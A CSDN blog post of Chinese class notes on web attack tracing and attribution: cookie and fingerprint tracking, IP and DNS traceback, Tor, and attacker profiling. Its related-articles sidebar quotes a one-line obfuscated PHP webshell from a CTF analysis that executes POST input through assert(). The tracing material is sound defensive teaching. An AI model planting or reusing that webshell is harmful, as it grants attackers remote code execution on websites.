【web论文】追踪溯源

最新推荐文章于 2024-04-17 12:37:03 发布
最新推荐文章于 2024-04-17 12:37:03 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: 网络安全 文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40859587/article/details/122136650
版权

web追踪与溯源——课堂笔记整理

追踪溯源就转换为如下一些问题的求解∶
1.攻击技术手段、战术方法与人员的关系(手法是否相似);
2.攻击资源之间、同时与人员的相似性(电脑、工具、Payload、后门、服务器等);
3.攻击人员的社交网络画像(昵称、邮箱、手机号、IP等);
4.不同网络资源中挖掘不同线索的相似性;
5.个人与团队成员、归属等方面关系挖掘;

Web追踪溯源技术:

Cookie 追踪

浏览器指纹

跨浏览器追踪

跨设备追踪

Ip追踪

域名/dns追踪

GPS/GIS追踪

匿名网络追踪

攻击手法等方面溯源

开源情报分析

网络攻击追踪溯源:确定攻击者的账号、身份、IP、MAC等虚拟地址和地理位置、攻击中间环节、还原攻击路径等
追踪溯源按深度分为:
1.攻击主机追踪 (IP追踪traceback)
IP/域名地址的物理定位GPS
IP、域名的归属者
攻击主机的指纹
网络中的主机
2.控制主机追踪
3.攻击者追踪
4.攻击组织

域内追踪;跨域追踪

难点
1.攻击前通常渗透控制多台计算机作为跳板
2.借助匿名通知系统

暗网追踪
特点:使用Tor协议,每个终端没有确定IP地址
数据经过三次随机跳转

岁月漫长_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
关于web论文
05-07
web课程论文,帮助我们了解.net和jsp的区别。很好的文章,值得大家下载
中睿天下-睿眼WEB攻击溯源系统-产品白皮书.pdf
05-17
中睿天下-睿眼WEB攻击溯源系统-产品白皮书:「攻击溯源」是基于「攻击者视角」构建的新一代安全防护体系。凭借近15年攻防实 战经验,从攻击者的视角获取对抗未知威胁的洞察力,中睿天下为用户的安全团队赋能,追 踪...
Web技术溯源&进入微服务
衡与墨的博客
05-04 790
前言 说学微服务说了一年半了,一直都没有真的去做,我是要反思的。 其实微服务的基础理论、结构,思想和意义都已经了解的很熟悉了,所差的就是实际的应用学习。选择学习的目标是spring cloud。dubbo太大太繁杂,而且应用不如cloud广泛。从长远来看,spring cloud的发展空间也更大。 spring cloud构建微服务的基础是spring boot,要学习spring cloud之前...
Web入侵溯源分析
最新发布
qq_69100706的博客
04-17 542
Web入侵的溯源分析是一个系统性的过程,涉及从攻击痕迹中收集证据、分析攻击手法、追踪攻击源头,并最终确定攻击者的身份和动机。
墨者学院 - WebShell代码分析溯源(第2题)
多崎巡礼的博客
07-31 743
<?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
作业6:Web 攻击溯源
diligent_lee的博客
07-20 811
信息安全实践作业6:Web 攻击溯源 事情情况: 某天晚上,X 单位的网站首页图片(banner_home.jpg)被胆大妄为的黑客 M 篡改了,管理员发现问题后第一时间关停了 Web 服务器,几天后提取了全部日志。(日志见另附件) 根据提供的日志进行分析得到以下内容: 黑客 M 篡改网站首页图片事件发生的日期是什么? 根据 log 文件,不难发现这是 Apache 日志,根据 Apache 访问日志格式可得,最后一个数字表示发送给客户端的总字节数。当网站首页图片被更改后,服务端发送给客户端的字节数应
网页3D溯源
webGL的专栏
03-11 486
      早期的web3D技术非常不成熟,比如Java Applet实现的简单交互式三维动画,不仅需要下载一个巨大的支持环境,而且画面非常粗糙,性能也很差。究其原因,就在于早期的这些交互式三维动画在做图形渲染时,并没有直接利用到图形硬件本身所带的加速功能,也就是,即使安装了性能很高的显卡,对于Web页面的交互式三维动画的显示也起不了什么作用。  后来,Adobe的Flash Player浏览
计算机网络追踪溯源技术.docx
09-30
计算机网络追踪溯源技术.docx
试论计算机网络追踪溯源技术.pdf
09-26
试论计算机网络追踪溯源技术.pdf
Web安全你了解多少(二)- HTTP基础&安全溯源
coding不死,也未曾凋零
07-11 3682
HTTP定义了客户端如何从Web服务器请求Web页面,以及Web服务器如何把Web页面传送给客户端; 通过TCP套接字,向Web服务器发送文本请求报文,一个请求报文由请求行、请求头部、空行和请求数据4部分组成; Web服务器解析请求,定位请求资源,将资源副本写到TCP套接字,由客户端读取; 返回响应之后,服务器检测connection状态,若connection模式为close,则服务器主动关闭TCP连接,客户端被动关闭连接,释放TCP连接 请求 GET POST DELETE HEAD ......
面向溯源取证的网络攻击工具痕迹分析技术与实现_何尾风.pdf
09-09
面向溯源取证的网络攻击工具痕迹分析技术与实现_何尾风
Web攻击与防护
11-06
在早期的互联网中,web并非主流的互联网应用,相对来说,给予SMTP、POP3、FTP、IRC等协议的用户拥有绝大数的用户,因此黑客们攻击的主要目标就是网络、操作系统以及软件的领域,WEB安全领域的攻击防御与技术均处于非常原始的阶段。随着时代的发展,运营商和防火墙对网络的封锁使得暴露在网络上的非WEB服务越来越少,且WEB技术的成熟使得WEB应用的功能越来越强大,最终成为互联网的主流,而黑客的目光也逐渐转移到WEB上,随之而来的就是WE安全问题!
Web会话跟踪技术
weixin_45511599的博客
08-07 333
客户端打开与服务器的连接发出请求到服务器响应客户端请求的全过程称之为会话。一个用户的所有请求都属于同一个会话对同一个用户向服务器发送请求以及服务器进行响应的过程的监视。
web程序开发 (2)论文
weixin_34290096的博客
01-12 403
3. 主要的开发语言和工具 主要的开发语言有HTML、XML、CSS、JavaScript、VBscript、J#、VB、Java、C#等。 常用到的web网页开发工具有很多,最常用的有文本、FrontPage、Dreamweaver、TopPage等,他们使得编制网页的工作变得既简单又容易。FrontPage是优秀的网页编辑器之一,新手能很快上手制作网页,具有易学、...
网络安全攻击溯源方法有哪些?
oldboyedu1的博客
02-29 572
攻击溯源可以帮助用户对攻击放进行锁定放入数据库,可以帮助其他用户进行态势感知,同时可以协调相关组织打击违法犯罪行为,避免下一次的攻击。2、分析攻击特征:通过分析攻击事件的特征,如攻击方式、攻击时间、攻击目标等,来确定攻击类型和攻击者的特点。4、分析攻击工具:通过分析攻击者使用的工具、恶意代码等,确定攻击者的攻击技术和水平,进而锁定攻击者身份。5、建立攻击链路:通过对攻击事件的各个环节进行分析,建立攻击链路,找到攻击者入侵的路径和方法。1、收集证据:收集攻击事件的各种证据,包括日志、网络数据包、磁盘镜像等。
攻击溯源手段
mingyqf的博客
03-17 4818
转载至:https://www.eumz.com/2020-09/2000.html 攻击溯源手段 攻击溯源的技术手段,主要包括ip定位、ID定位与攻击者定位。 通过ip可定位攻击者所在位置,以及通过ip反查域名等手段,查询域名的注册信息,域名注册人及邮箱等信息。 通过ID定位可获取攻击者常用的网络ID,查询攻击者使用同类ID注册过的微博或者博客、论坛等网站,通过对网络ID注册以及使用情况的查询,定位攻击者所在公司、手机号、邮箱、QQ等信息。 或通过其他手段定位攻击者,如反制攻击者vps,获取攻击者vps中
通过服务器日志溯源定位web应用攻击路径
Enweitech Software Works
07-03 2618
无论是我们使用的个人计算机还是服务器都为我们提供了强大的日志记录功能。例如系统日志,可以为我们记录系统硬件、软件和系统问题的信息,用户可以通过它来检查错误发生的原因,或者寻找受到攻击时攻击者留下的痕迹。 而服务器日志,则主要包括访问日志和错误日志。访问日志记录了该服务器所有的请求的过程,主要记录的是客户的各项信息,如访问时间、内容、地址等。错误日志则记录服务器出错的细节等数据。同时,这些
基于web的传统溯源有什么缺点
05-26
基于web的传统溯源有以下几个缺点: 1. 安全性问题:基于web的传统溯源...5. 隐私问题:基于web的传统溯源架构可能会暴露用户的个人隐私,因为数据可能会被收集和分析,而且用户的身份和行为也可能会被追踪和记录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

岁月漫长_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值